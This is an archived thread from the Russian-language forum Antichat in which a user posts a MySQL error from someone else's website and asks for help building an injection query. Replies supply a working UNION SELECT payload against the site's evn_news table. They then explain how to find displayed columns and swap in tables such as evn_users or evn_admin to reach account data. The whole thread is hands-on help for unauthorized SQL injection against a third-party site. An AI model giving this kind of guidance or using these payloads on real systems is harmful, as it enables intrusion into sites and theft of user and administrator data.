Форум АНТИЧАТ - Mysql иньекция

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)

- - Mysql иньекция (https://forum.antichat.xyz/showthread.php?t=12706)

k0ldun

09.01.2006 18:32

Mysql иньекция

здарова всем, помогите составить запрос

Цитата:

MySQL couldn't execute this query - SELECT id, title, body, status, image, comment, position, DATE_FORMAT(time_insert,'%e.%m.%Y | %H:%i') as new_date FROM evn_news WHERE id = 3682\'

virgoz

09.01.2006 21:46

-1+union+select+1,2,3,4,5,6,7,8+from+evn_news/*

max_pain89

09.01.2006 23:04

далее вместо 1-8 пытаешься подставить слово и ищешь его на страничке.
Если нашел... меняешь evn_news на скажем evn_users или evn_admin может evn_member, а дальше пытаешься угадать столбец

virgoz

09.01.2006 23:47

Цитата:

далее вместо 1-8 пытаешься подставить слово и ищешь его на страничке.

Можно просто по цифрам найти, что выводится. Для этого и нумеруют ;) И слово это надо в кавычки обязательно ставить, которые часто экранируются.

Время: 16:52